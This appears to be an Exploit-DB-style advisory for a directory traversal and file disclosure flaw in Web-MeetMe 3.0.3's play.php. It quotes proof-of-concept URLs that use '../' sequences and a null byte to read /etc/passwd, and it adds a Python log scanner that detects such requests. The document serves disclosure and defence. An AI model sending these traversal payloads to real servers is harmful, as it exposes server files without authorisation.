Vendor: Web-MeetMe
By: Evil.Man
CVSS: 7.5 (HIGH)
CWE: Remote File Disclosure
Product Name: Web-MeetMe
Affected Version From: Web-MeetMe 3.0.3
Affected Version To: Web-MeetMe 3.0.3
Patch Exists: NO
Platforms Tested:
2007

Web-MeetMe 3.0.3 Remote File Disclosure Vulnerability

Web-MeetMe 3.0.3 is vulnerable to remote file disclosure. The 'roomNo' and 'bookid' parameters of the 'play.php' script accept directory traversal sequences ('../') terminated by a null byte ('%00'), which lets a remote attacker read sensitive files on the server, such as '/etc/passwd'. The vulnerability was discovered by Evil.Man.

Mitigation:

The vendor has not released a patch for this vulnerability. To mitigate the risk, it is recommended to restrict access to the 'play.php' script or remove it entirely from the server.
Source

Exploit-DB raw data:

/--------------------------------------------------------------------------\
|Web-MeetMe 3.0.3 (play.php) Remote File Disclosure Vulnerability          |
|Download Script :                                                         |
| http://sourceforge.net/project/showfiles.php?group_id=164788             |
|POC :                                                                     |
| Web-MeetMe_v3.0.3/play.php?roomNo=../../../../../../../../etc/passwd%00  |
| Web-MeetMe_v3.0.3/play.php?bookid=../../../../../../../../etc/passwd%00  |
|Discovered by : Evil.Man                                                  |
|Home Page : Tryag.Com/cc                                                  |
|Email : Evil.Man@windowslive.com                                          |
|Sp.Thanx To : GoLd_M [Mahmood_ali"Tryag.Com"] & Sniper-Sa.Com             |
\--------------------------------------------------------------------------/

# milw0rm.com [2007-11-29]
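
With no vendor patch available, reviewing web server logs for the request pattern shown in the PoC is a practical check. The Python below is an added example, not part of the original advisory or the Web-MeetMe project; the Apache-style log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

WATCHED = {"roomno", "bookid"}  # play.php parameters named in the advisory
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "\S+ (\S+)[^"]*" (\d{3})')

# Constructed sample access-log lines (documentation IP ranges, invented times).
SAMPLE_LOG = [
    '198.51.100.4 - - [01/Jan/2024:10:00:00 +0000] "GET /Web-MeetMe_v3.0.3/play.php?roomNo=1234&bookid=17 HTTP/1.1" 200 812',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /Web-MeetMe_v3.0.3/play.php?roomNo=../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /Web-MeetMe_v3.0.3/play.php?bookid=%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 404 210',
    '198.51.100.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?roomNo=../x HTTP/1.1" 200 99',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input is also recognised."""
    for _ in range(max_rounds):
        decoded = unquote(value, encoding="latin-1")
        if decoded == value:
            break
        value = decoded
    return value

def suspicious(raw_value):
    """Return the reasons a parameter value looks like a traversal attempt."""
    v = fully_decode(raw_value).replace("\\", "/")
    reasons = []
    if "../" in v or v.endswith(".."):
        reasons.append("dot-dot-slash")
    if "\x00" in v:
        reasons.append("null-byte")
    return reasons

def scan(lines):
    """Return (client, status, param, reasons) for flagged play.php requests."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/play.php"):
            continue
        for pair in url.query.split("&"):  # keep values encoded for fully_decode
            name, _, raw = pair.partition("=")
            if unquote(name).lower() in WATCHED and suspicious(raw):
                hits.append((client, int(status), unquote(name), suspicious(raw)))
    return hits
```

A flagged request that returned status 200 is the one to investigate first, since the response may have contained file contents.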